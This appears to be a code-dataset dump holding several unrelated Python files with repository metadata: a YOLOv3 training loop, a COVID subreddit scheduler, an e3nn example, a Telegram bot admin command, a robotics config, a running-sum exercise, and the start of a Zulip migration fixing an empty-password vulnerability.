self.input_data = tf.placeholder(dtype=tf.float32, name='input_data')
self.label_sbbox = tf.placeholder(dtype=tf.float32, name='label_sbbox')
self.label_mbbox = tf.placeholder(dtype=tf.float32, name='label_mbbox')
self.label_lbbox = tf.placeholder(dtype=tf.float32, name='label_lbbox')
self.true_sbboxes = tf.placeholder(dtype=tf.float32, name='sbboxes')
self.true_mbboxes = tf.placeholder(dtype=tf.float32, name='mbboxes')
self.true_lbboxes = tf.placeholder(dtype=tf.float32, name='lbboxes')
self.trainable = tf.placeholder(dtype=tf.bool, name='training')
with tf.name_scope("define_loss"):
self.model = YOLOV3(self.input_data, self.trainable)
self.net_var = tf.global_variables()
self.giou_loss, self.conf_loss, self.prob_loss = self.model.compute_loss(
self.label_sbbox, self.label_mbbox, self.label_lbbox,
self.true_sbboxes, self.true_mbboxes, self.true_lbboxes)
self.loss = self.giou_loss + self.conf_loss + self.prob_loss
with tf.name_scope('learn_rate'):
self.global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(self.warmup_periods * self.steps_per_period,
dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant((self.first_stage_epochs + self.second_stage_epochs) * self.steps_per_period,
dtype=tf.float64, name='train_steps')
self.learn_rate = tf.cond(
pred=self.global_step < warmup_steps,
true_fn=lambda: self.global_step / warmup_steps * self.learn_rate_init,
false_fn=lambda: self.learn_rate_end + 0.5 * (self.learn_rate_init - self.learn_rate_end) *
(1 + tf.cos(
(self.global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(self.global_step, 1.0)
with tf.name_scope("define_weight_decay"):
moving_ave = tf.train.ExponentialMovingAverage(self.moving_ave_decay).apply(tf.trainable_variables())
with tf.name_scope('loader_and_saver'):
variables_to_restore = [v for v in self.net_var if
v.name.split('/')[0] not in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']]
self.loader = tf.train.Saver(variables_to_restore)
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)
with tf.name_scope("define_first_stage_train"):
self.first_stage_trainable_var_list = []
for var in tf.trainable_variables():
var_name = var.op.name
var_name_mess = str(var_name).split('/')
if var_name_mess[0] in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']:
self.first_stage_trainable_var_list.append(var)
first_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=self.first_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([first_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_frozen_variables = tf.no_op()
with tf.name_scope("define_second_stage_train"):
second_stage_trainable_var_list = tf.trainable_variables()
second_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=second_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([second_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_all_variables = tf.no_op()
with tf.name_scope('summary'):
tf.summary.scalar("learn_rate", self.learn_rate)
tf.summary.scalar("giou_loss", self.giou_loss)
tf.summary.scalar("conf_loss", self.conf_loss)
tf.summary.scalar("prob_loss", self.prob_loss)
tf.summary.scalar("total_loss", self.loss)
logdir = "./data/log/"
if os.path.exists(logdir): shutil.rmtree(logdir)
os.mkdir(logdir)
self.write_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(logdir, graph=self.sess.graph)
def train(self):
self.sess.run(tf.global_variables_initializer())
try:
print('=> Restoring weights from: %s ... ' % self.initial_weight)
self.loader.restore(self.sess, self.initial_weight)
except:
print('=> %s does not exist !!!' % self.initial_weight)
print('=> Now it starts to train YOLOV3 from scratch ...')
self.first_stage_epochs = 0
for epoch in range(1, 1 + self.first_stage_epochs + self.second_stage_epochs):
if epoch <= self.first_stage_epochs:
train_op = self.train_op_with_frozen_variables
else:
train_op = self.train_op_with_all_variables
pbar = tqdm(self.trainset)
train_epoch_loss, test_epoch_loss = [], []
for train_data in pbar:
_, summary, train_step_loss, global_step_val = self.sess.run(
[train_op, self.write_op, self.loss, self.global_step], feed_dict={
self.input_data: train_data[0],
self.label_sbbox: train_data[1],
self.label_mbbox: train_data[2],
self.label_lbbox: train_data[3],
self.true_sbboxes: train_data[4],
self.true_mbboxes: train_data[5],
self.true_lbboxes: train_data[6],
self.trainable: True,
})
train_epoch_loss.append(train_step_loss)
self.summary_writer.add_summary(summary, global_step_val)
pbar.set_description("train loss: %.2f" % train_step_loss)
for test_data in self.testset:
test_step_loss = self.sess.run(self.loss, feed_dict={
self.input_data: test_data[0],
self.label_sbbox: test_data[1],
self.label_mbbox: test_data[2],
self.label_lbbox: test_data[3],
self.true_sbboxes: test_data[4],
self.true_mbboxes: test_data[5],
self.true_lbboxes: test_data[6],
self.trainable: False,
})
test_epoch_loss.append(test_step_loss)
train_epoch_loss, test_epoch_loss = np.mean(train_epoch_loss), np.mean(test_epoch_loss)
ckpt_file = "./checkpoint/yolov3_train_loss=%.4f.ckpt" % train_epoch_loss
log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
print("=> Epoch: %2d Time: %s Train loss: %.2f Test loss: %.2f Saving %s ..."
% (epoch, log_time, train_epoch_loss, test_epoch_loss, ckpt_file))
self.saver.save(self.sess, ckpt_file, global_step=epoch)
if __name__ == '__main__': YoloTrain().train()
| true
| true
|
790c82c158782609b311d42e9802acdd50fad13c
| 586
|
py
|
Python
|
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | 9
|
2020-11-02T17:30:48.000Z
|
2021-01-20T06:48:17.000Z
|
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
import praw
import database_infrastructure.dbHandler as dbController
from apscheduler.schedulers.background import BackgroundScheduler
import redditController.collectSubredditsForAsync as redditController
def collectSubredditsForCovid():
redditController.collectSubredditsForCovid('covid')
redditController.collectSubredditsForCovid('covid19')
def collectAsync():
print("registering async background job")
scheduler = BackgroundScheduler()
scheduler.add_job(func=collectSubredditsForCovid,
trigger="interval", days=1)
scheduler.start()
| 32.555556
| 69
| 0.793515
|
import praw
import database_infrastructure.dbHandler as dbController
from apscheduler.schedulers.background import BackgroundScheduler
import redditController.collectSubredditsForAsync as redditController
def collectSubredditsForCovid():
redditController.collectSubredditsForCovid('covid')
redditController.collectSubredditsForCovid('covid19')
def collectAsync():
print("registering async background job")
scheduler = BackgroundScheduler()
scheduler.add_job(func=collectSubredditsForCovid,
trigger="interval", days=1)
scheduler.start()
| true
| true
|
790c8392467ad202258620063e9fd445dd446396
| 1,311
|
py
|
Python
|
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
tests/readme_example_test.py
|
mister-bailey/e3nn
|
43d4b12f5ba5947583feb35f4e0662b73aae5618
|
[
"MIT"
] | null | null | null |
# pylint: disable=missing-docstring, line-too-long, invalid-name, arguments-differ, no-member, pointless-statement
from functools import partial
import torch
from e3nn import Kernel, rs
from e3nn.non_linearities.norm import Norm
from e3nn.non_linearities.rescaled_act import swish
from e3nn.point.operations import Convolution
from e3nn.radial import GaussianRadialModel
# Define the input and output representations
Rs_in = [(1, 0), (2, 1)] # Input = One scalar plus two vectors
Rs_out = [(1, 1)] # Output = One single vector
# Radial model: R+ -> R^d
RadialModel = partial(GaussianRadialModel, max_radius=3.0, number_of_basis=3, h=100, L=1, act=swish)
# kernel: composed on a radial part that contains the learned parameters
# and an angular part given by the spherical hamonics and the Clebsch-Gordan coefficients
K = partial(Kernel, RadialModel=RadialModel)
# Create the convolution module
conv = Convolution(K(Rs_in, Rs_out))
# Module to compute the norm of each irreducible component
norm = Norm(Rs_out)
n = 5 # number of input points
features = rs.randn(1, n, Rs_in, requires_grad=True)
in_geometry = torch.randn(1, n, 3)
out_geometry = torch.zeros(1, 1, 3) # One point at the origin
out = norm(conv(features, in_geometry, out_geometry))
out.backward()
print(out)
print(features.grad)
| 31.214286
| 114
| 0.762777
|
from functools import partial
import torch
from e3nn import Kernel, rs
from e3nn.non_linearities.norm import Norm
from e3nn.non_linearities.rescaled_act import swish
from e3nn.point.operations import Convolution
from e3nn.radial import GaussianRadialModel
Rs_in = [(1, 0), (2, 1)]
Rs_out = [(1, 1)]
RadialModel = partial(GaussianRadialModel, max_radius=3.0, number_of_basis=3, h=100, L=1, act=swish)
K = partial(Kernel, RadialModel=RadialModel)
conv = Convolution(K(Rs_in, Rs_out))
norm = Norm(Rs_out)
n = 5
features = rs.randn(1, n, Rs_in, requires_grad=True)
in_geometry = torch.randn(1, n, 3)
out_geometry = torch.zeros(1, 1, 3)
out = norm(conv(features, in_geometry, out_geometry))
out.backward()
print(out)
print(features.grad)
| true
| true
|
790c83bde7978a528a445d3b39187b4932030a65
| 2,400
|
py
|
Python
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 20
|
2022-02-05T17:35:24.000Z
|
2022-03-31T12:23:29.000Z
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 8
|
2022-02-07T17:29:39.000Z
|
2022-03-18T17:30:31.000Z
|
LuciferMoringstar_Robot/admins/chat.py
|
PR0FESS0R-99/LuciferMoringstar-Robot
|
d4864b7be54f066e8241e7067eb086f835d3ec9d
|
[
"MIT"
] | 137
|
2022-02-05T14:50:15.000Z
|
2022-03-31T12:23:42.000Z
|
# MIT License
# Copyright (c) 2022 Muhammed
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Telegram Link : https://telegram.dog/Mo_Tech_Group
# Repo Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot
# License Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot/blob/LuciferMoringstar-Robot/LICENSE
from pyrogram import Client as lucifermoringstar_robot , filters, enums
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from LuciferMoringstar_Robot import ADMINS, CREATOR_USERNAME
@lucifermoringstar_robot.on_message((filters.group | filters.private) & filters.command('leave') & filters.user(ADMINS))
async def leave_bot(bot, update):
if len(update.command) == 1:
return await update.reply_text("𝙶𝙸𝚅𝙴 𝙼𝙴 𝙰 𝙶𝚁𝙾𝚄𝙿 𝙸𝙳")
chat = update.command[1]
try:
chat = int(chat)
except:
chat = chat
try:
pr0fess0r_99 = [[ InlineKeyboardButton('𝙶𝙴𝚃 𝚂𝚄𝙿𝙿𝙾𝚁𝚃', url=f'https://t.me/{CREATOR_USERNAME}') ]]
pr0fess0r_99 = InlineKeyboardMarkup(pr0fess0r_99)
await bot.send_message(chat_id=chat, text="𝙷𝙴𝙻𝙻𝙾 𝙵𝚁𝙸𝙴𝙽𝙳𝚂,\n𝙼𝚈 𝙼𝙰𝚂𝚃𝙴𝚁 𝙷𝙰𝚂 𝚃𝙾𝙻𝙳 𝙼𝙴 𝚃𝙾 𝙻𝙴𝙰𝚅𝙴 𝙵𝚁𝙾𝙼 𝙶𝚁𝙾𝚄𝙿. 𝚂𝙾 𝙸 𝙶𝙾 😛. 𝙸𝙵 𝚈𝙾𝚄 𝚆𝙰𝙽𝙽𝙰 𝙰𝙳𝙳 𝙼𝙴 𝙰𝙶𝙰𝙸𝙽 𝙲𝙾𝙽𝚃𝙰𝙲𝚃 𝙼𝙴", reply_markup=pr0fess0r_99)
await bot.leave_chat(chat)
await update.reply(f"𝙻𝙴𝙵𝚃 𝚃𝙷𝙴 𝙲𝙷𝙰𝚃 `{chat}`")
except Exception as e:
await update.reply(f'𝙴𝚁𝚁𝙾𝚁 - {e}')
| 50
| 186
| 0.750833
|
from pyrogram import Client as lucifermoringstar_robot , filters, enums
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from LuciferMoringstar_Robot import ADMINS, CREATOR_USERNAME
@lucifermoringstar_robot.on_message((filters.group | filters.private) & filters.command('leave') & filters.user(ADMINS))
async def leave_bot(bot, update):
if len(update.command) == 1:
return await update.reply_text("𝙶𝙸𝚅𝙴 𝙼𝙴 𝙰 𝙶𝚁𝙾𝚄𝙿 𝙸𝙳")
chat = update.command[1]
try:
chat = int(chat)
except:
chat = chat
try:
pr0fess0r_99 = [[ InlineKeyboardButton('𝙶𝙴𝚃 𝚂𝚄𝙿𝙿𝙾𝚁𝚃', url=f'https://t.me/{CREATOR_USERNAME}') ]]
pr0fess0r_99 = InlineKeyboardMarkup(pr0fess0r_99)
await bot.send_message(chat_id=chat, text="𝙷𝙴𝙻𝙻𝙾 𝙵𝚁𝙸𝙴𝙽𝙳𝚂,\n𝙼𝚈 𝙼𝙰𝚂𝚃𝙴𝚁 𝙷𝙰𝚂 𝚃𝙾𝙻𝙳 𝙼𝙴 𝚃𝙾 𝙻𝙴𝙰𝚅𝙴 𝙵𝚁𝙾𝙼 𝙶𝚁𝙾𝚄𝙿. 𝚂𝙾 𝙸 𝙶𝙾 😛. 𝙸𝙵 𝚈𝙾𝚄 𝚆𝙰𝙽𝙽𝙰 𝙰𝙳𝙳 𝙼𝙴 𝙰𝙶𝙰𝙸𝙽 𝙲𝙾𝙽𝚃𝙰𝙲𝚃 𝙼𝙴", reply_markup=pr0fess0r_99)
await bot.leave_chat(chat)
await update.reply(f"𝙻𝙴𝙵𝚃 𝚃𝙷𝙴 𝙲𝙷𝙰𝚃 `{chat}`")
except Exception as e:
await update.reply(f'𝙴𝚁𝚁𝙾𝚁 - {e}')
| true
| true
|
790c844cb49cb3321bf8dff698dec4c13b34d721
| 1,945
|
py
|
Python
|
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | 8
|
2021-10-14T03:14:23.000Z
|
2022-03-15T21:31:17.000Z
|
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | null | null | null |
spirl/configs/few_shot_imitation_learning/kitchen/hierarchical_cl_gc_top_bot_excluded_demo_topknob_bot_hinge_slide_oneshot/conf.py
|
kouroshHakha/fist
|
328c098789239fd892e17edefd799fc1957ab637
|
[
"BSD-3-Clause"
] | 1
|
2021-09-13T20:42:28.000Z
|
2021-09-13T20:42:28.000Z
|
import os
from spirl.models.closed_loop_spirl_mdl import GoalClSPiRLMdl
from spirl.components.logger import Logger
from spirl.utils.general_utils import AttrDict
from spirl.configs.default_data_configs.kitchen import data_spec
from spirl.components.evaluator import TopOfNSequenceEvaluator
from spirl.data.kitchen.src.kitchen_data_loader import KitchenStateSeqDataset
current_dir = os.path.dirname(os.path.realpath(__file__))
fewshot_dataset = KitchenStateSeqDataset(
data_path='data/kitchen/kitchen-demo-topknob_bottomknob_hinge_slide.hdf5',
num_demo=1,
subseq_len=10,
)
env = AttrDict(
task_list = ['top burner', 'bottom burner', 'hinge cabinet', 'slide cabinet']
)
contra_model_cf = AttrDict(
state_dimension=data_spec.state_dim,
hidden_size=128,
feature_size=32,
)
configuration = {
'model': GoalClSPiRLMdl,
'logger': Logger,
'data_dir': '.',
'epoch_cycles_train': 1,
'evaluator': TopOfNSequenceEvaluator,
'top_of_n_eval': 100,
'top_comp_metric': 'mse',
'batch_size': 128,
'num_epochs': 50,
'fewshot_data': fewshot_dataset,
'fewshot_batch_size': 128,
'contra_config': contra_model_cf,
'contra_ckpt': './experiments/contrastive/kitchen/exact-mixed-all/exact_model.pt',
'finetune_vae': True,
}
configuration = AttrDict(configuration)
model_config = AttrDict(
state_dim=data_spec.state_dim,
action_dim=data_spec.n_actions,
n_rollout_steps=10,
kl_div_weight=5e-4,
nz_enc=128,
nz_mid=128,
n_processing_layers=5,
cond_decode=True,
checkpt_path=f'{os.environ["EXP_DIR"]}/skill_prior_learning/kitchen/hierarchical_cl_gc_top_bot_excluded'
)
# Dataset
data_config = AttrDict()
data_config.dataset_spec = data_spec
data_config.dataset_spec['dataset_path'] = './data/kitchen/kitchen-mixed-top-bot-excluded.hdf5'
data_config.dataset_spec.subseq_len = model_config.n_rollout_steps + 1 # flat last action from seq gets cropped
| 30.873016
| 112
| 0.759897
|
import os
from spirl.models.closed_loop_spirl_mdl import GoalClSPiRLMdl
from spirl.components.logger import Logger
from spirl.utils.general_utils import AttrDict
from spirl.configs.default_data_configs.kitchen import data_spec
from spirl.components.evaluator import TopOfNSequenceEvaluator
from spirl.data.kitchen.src.kitchen_data_loader import KitchenStateSeqDataset
current_dir = os.path.dirname(os.path.realpath(__file__))
fewshot_dataset = KitchenStateSeqDataset(
data_path='data/kitchen/kitchen-demo-topknob_bottomknob_hinge_slide.hdf5',
num_demo=1,
subseq_len=10,
)
env = AttrDict(
task_list = ['top burner', 'bottom burner', 'hinge cabinet', 'slide cabinet']
)
contra_model_cf = AttrDict(
state_dimension=data_spec.state_dim,
hidden_size=128,
feature_size=32,
)
configuration = {
'model': GoalClSPiRLMdl,
'logger': Logger,
'data_dir': '.',
'epoch_cycles_train': 1,
'evaluator': TopOfNSequenceEvaluator,
'top_of_n_eval': 100,
'top_comp_metric': 'mse',
'batch_size': 128,
'num_epochs': 50,
'fewshot_data': fewshot_dataset,
'fewshot_batch_size': 128,
'contra_config': contra_model_cf,
'contra_ckpt': './experiments/contrastive/kitchen/exact-mixed-all/exact_model.pt',
'finetune_vae': True,
}
configuration = AttrDict(configuration)
model_config = AttrDict(
state_dim=data_spec.state_dim,
action_dim=data_spec.n_actions,
n_rollout_steps=10,
kl_div_weight=5e-4,
nz_enc=128,
nz_mid=128,
n_processing_layers=5,
cond_decode=True,
checkpt_path=f'{os.environ["EXP_DIR"]}/skill_prior_learning/kitchen/hierarchical_cl_gc_top_bot_excluded'
)
data_config = AttrDict()
data_config.dataset_spec = data_spec
data_config.dataset_spec['dataset_path'] = './data/kitchen/kitchen-mixed-top-bot-excluded.hdf5'
data_config.dataset_spec.subseq_len = model_config.n_rollout_steps + 1
| true
| true
|
790c8482c1e66dc7260d46dfd9b7f13d639df13f
| 1,019
|
py
|
Python
|
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
proj02_loops/proj02_01.py
|
ryanaspears/VSA
|
6532a447a6afc4bdc14eff58b99be9361e29e8f9
|
[
"MIT"
] | null | null | null |
# Name:
# Date:
# proj02: sum
# Write a program that prompts the user to enter numbers, one per line,
# ending with a line containing 0, and keep a running sum of the numbers.
# Only print out the sum after all the numbers are entered
# (at least in your final version). Each time you read in a number,
# you can immediately use it for your sum,
# and then be done with the number just entered.
# Example:
# Enter a number to sum, or 0 to indicate you are finished: 4
# Enter a number to sum, or 0 to indicate you are finished: 5
# Enter a number to sum, or 0 to indicate you are finished: 2
# Enter a number to sum, or 0 to indicate you are finished: 10
# Enter a number to sum, or 0 to indicate you are finished: 0
# The sum of your numbers is: 21
input_sum = 0
var = 1
while var != 0:
input1 = raw_input("Enter a number to sum, or 0 to indicate you are finished: ")
input_sum = int(input1) + input_sum
if int(input1) == 0:
var = 0
print"The sum of your numbers is: " + str(input_sum)
| 35.137931
| 84
| 0.697743
|
input_sum = 0
var = 1
while var != 0:
input1 = raw_input("Enter a number to sum, or 0 to indicate you are finished: ")
input_sum = int(input1) + input_sum
if int(input1) == 0:
var = 0
print"The sum of your numbers is: " + str(input_sum)
| false
| true
|
790c8484bbd71d0aa80124fd55ed271bdea204d5
| 11,210
|
py
|
Python
|
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | null | null | null |
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | null | null | null |
zerver/migrations/0209_user_profile_no_empty_password.py
|
Bpapman/zulip
|
76eeb4f6bf7d6f706337c1bbc3d6e19818c945d8
|
[
"Apache-2.0"
] | 1
|
2020-07-06T11:43:28.000Z
|
2020-07-06T11:43:28.000Z
|
# Generated by Django 1.11.24 on 2019-10-16 22:48
from typing import Any, Set, Union
import ujson
from django.conf import settings
from django.contrib.auth.hashers import check_password, make_password
from django.db import migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.utils.timezone import now as timezone_now
from zerver.lib.cache import cache_delete, user_profile_by_api_key_cache_key
from zerver.lib.queue import queue_json_publish
from zerver.lib.utils import generate_api_key
def ensure_no_empty_passwords(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
"""With CVE-2019-18933, it was possible for certain users created
using social login (e.g. Google/GitHub auth) to have the empty
string as their password in the Zulip database, rather than
Django's "unusable password" (i.e. no password at all). This was a
serious security issue for organizations with both password and
Google/GitHub authentication enabled.
Combined with the code changes to prevent new users from entering
this buggy state, this migration sets the intended "no password"
state for any users who are in this buggy state, as had been
intended.
While this bug was discovered by our own development team and we
believe it hasn't been exploited in the wild, out of an abundance
of caution, this migration also resets the personal API keys for
all users where Zulip's database-level logging cannot **prove**
that user's current personal API key was never accessed using this
bug.
There are a few ways this can be proven: (1) the user's password
has never been changed and is not the empty string,
or (2) the user's personal API key has changed since that user last
changed their password (which is not ''). Both constitute proof
because this bug cannot be used to gain the access required to change
or reset a user's password.
Resetting those API keys has the effect of logging many users out
of the Zulip mobile and terminal apps unnecessarily (e.g. because
the user changed their password at any point in the past, even
though the user never was affected by the bug), but we're
comfortable with that cost for ensuring that this bug is
completely fixed.
To avoid this inconvenience for self-hosted servers which don't
even have EmailAuthBackend enabled, we skip resetting any API keys
if the server doesn't have EmailAuthBackend configured.
"""
UserProfile = apps.get_model('zerver', 'UserProfile')
RealmAuditLog = apps.get_model('zerver', 'RealmAuditLog')
# Because we're backporting this migration to the Zulip 2.0.x
# series, we've given it migration number 0209, which is a
# duplicate with an existing migration already merged into Zulip
# master. Migration 0247_realmauditlog_event_type_to_int.py
# changes the format of RealmAuditLog.event_type, so we need the
# following conditional block to determine what values to use when
# searching for the relevant events in that log.
event_type_class = RealmAuditLog._meta.get_field('event_type').get_internal_type()
if event_type_class == 'CharField':
USER_PASSWORD_CHANGED: Union[int, str] = 'user_password_changed'
USER_API_KEY_CHANGED: Union[int, str] = 'user_api_key_changed'
else:
USER_PASSWORD_CHANGED = 122
USER_API_KEY_CHANGED = 127
# First, we do some bulk queries to collect data we'll find useful
# in the loop over all users below.
# Users who changed their password at any time since account
# creation. These users could theoretically have started with an
# empty password, but set a password later via the password reset
# flow. If their API key has changed since they changed their
# password, we can prove their current API key cannot have been
# exposed; we store those users in
# password_change_user_ids_no_reset_needed.
password_change_user_ids = set(RealmAuditLog.objects.filter(
event_type=USER_PASSWORD_CHANGED).values_list("modified_user_id", flat=True))
password_change_user_ids_api_key_reset_needed: Set[int] = set()
password_change_user_ids_no_reset_needed: Set[int] = set()
for user_id in password_change_user_ids:
# Here, we check the timing for users who have changed
# their password.
# We check if the user changed their API key since their first password change.
query = RealmAuditLog.objects.filter(
modified_user=user_id, event_type__in=[USER_PASSWORD_CHANGED,
USER_API_KEY_CHANGED]
).order_by("event_time")
earliest_password_change = query.filter(event_type=USER_PASSWORD_CHANGED).first()
# Since these users are in password_change_user_ids, this must not be None.
assert earliest_password_change is not None
latest_api_key_change = query.filter(event_type=USER_API_KEY_CHANGED).last()
if latest_api_key_change is None:
# This user has never changed their API key. As a
# result, even though it's very likely this user never
# had an empty password, they have changed their
# password, and we have no record of the password's
# original hash, so we can't prove the user's API key
# was never affected. We schedule this user's API key
# to be reset.
password_change_user_ids_api_key_reset_needed.add(user_id)
elif earliest_password_change.event_time <= latest_api_key_change.event_time:
# This user has changed their password before
# generating their current personal API key, so we can
# prove their current personal API key could not have
# been exposed by this bug.
password_change_user_ids_no_reset_needed.add(user_id)
else:
password_change_user_ids_api_key_reset_needed.add(user_id)
if password_change_user_ids_no_reset_needed and settings.PRODUCTION:
# We record in this log file users whose current API key was
# generated after a real password was set, so there's no need
# to reset their API key, but because they've changed their
# password, we don't know whether or not they originally had a
# buggy password.
#
# In theory, this list can be recalculated using the above
# algorithm modified to only look at events before the time
# this migration was installed, but it's helpful to log it as well.
with open("/var/log/zulip/0209_password_migration.log", "w") as log_file:
line = "No reset needed, but changed password: {}\n"
log_file.write(line.format(password_change_user_ids_no_reset_needed))
AFFECTED_USER_TYPE_EMPTY_PASSWORD = 'empty_password'
AFFECTED_USER_TYPE_CHANGED_PASSWORD = 'changed_password'
MIGRATION_ID = '0209_user_profile_no_empty_password'
def write_realm_audit_log_entry(user_profile: Any,
event_time: Any, event_type: Any,
affected_user_type: str) -> None:
RealmAuditLog.objects.create(
realm=user_profile.realm,
modified_user=user_profile,
event_type=event_type,
event_time=event_time,
extra_data=ujson.dumps({
'migration_id': MIGRATION_ID,
'affected_user_type': affected_user_type,
})
)
# If Zulip's built-in password authentication is not enabled on
# the server level, then we plan to skip resetting any users' API
# keys, since the bug requires EmailAuthBackend.
email_auth_enabled = 'zproject.backends.EmailAuthBackend' in settings.AUTHENTICATION_BACKENDS
# A quick note: This query could in theory exclude users with
# is_active=False, is_bot=True, or realm__deactivated=True here to
# accessing only active human users in non-deactivated realms.
# But it's better to just be thorough; users can be reactivated,
# and e.g. a server admin could manually edit the database to
# change a bot into a human user if they really wanted to. And
# there's essentially no harm in rewriting state for a deactivated
# account.
for user_profile in UserProfile.objects.all():
event_time = timezone_now()
if check_password('', user_profile.password):
# This user currently has the empty string as their password.
# Change their password and record that we did so.
user_profile.password = make_password(None)
update_fields = ["password"]
write_realm_audit_log_entry(user_profile, event_time,
USER_PASSWORD_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
if email_auth_enabled and not user_profile.is_bot:
# As explained above, if the built-in password authentication
# is enabled, reset the API keys. We can skip bot accounts here,
# because the `password` attribute on a bot user is useless.
reset_user_api_key(user_profile)
update_fields.append("api_key")
event_time = timezone_now()
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_EMPTY_PASSWORD)
user_profile.save(update_fields=update_fields)
continue
elif email_auth_enabled and \
user_profile.id in password_change_user_ids_api_key_reset_needed:
# For these users, we just need to reset the API key.
reset_user_api_key(user_profile)
user_profile.save(update_fields=["api_key"])
write_realm_audit_log_entry(user_profile, event_time,
USER_API_KEY_CHANGED,
AFFECTED_USER_TYPE_CHANGED_PASSWORD)
def reset_user_api_key(user_profile: Any) -> None:
old_api_key = user_profile.api_key
user_profile.api_key = generate_api_key()
cache_delete(user_profile_by_api_key_cache_key(old_api_key))
# Like with any API key change, we need to clear any server-side
# state for sending push notifications to mobile app clients that
# could have been registered with the old API key. Fortunately,
# we can just write to the queue processor that handles sending
# those notices to the push notifications bouncer service.
event = {'type': 'clear_push_device_tokens',
'user_profile_id': user_profile.id}
queue_json_publish("deferred_work", event)
class Migration(migrations.Migration):
atomic = False
dependencies = [
('zerver', '0208_add_realm_night_logo_fields'),
]
operations = [
migrations.RunPython(ensure_no_empty_passwords,
reverse_code=migrations.RunPython.noop),
]
| 48.73913
| 97
| 0.692507
|
from typing import Any, Set, Union
import ujson
from django.conf import settings
from django.contrib.auth.hashers import check_password, make_password
from django.db import migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.utils.timezone import now as timezone_now
from zerver.lib.cache import cache_delete, user_profile_by_api_key_cache_key
from zerver.lib.queue import queue_json_publish
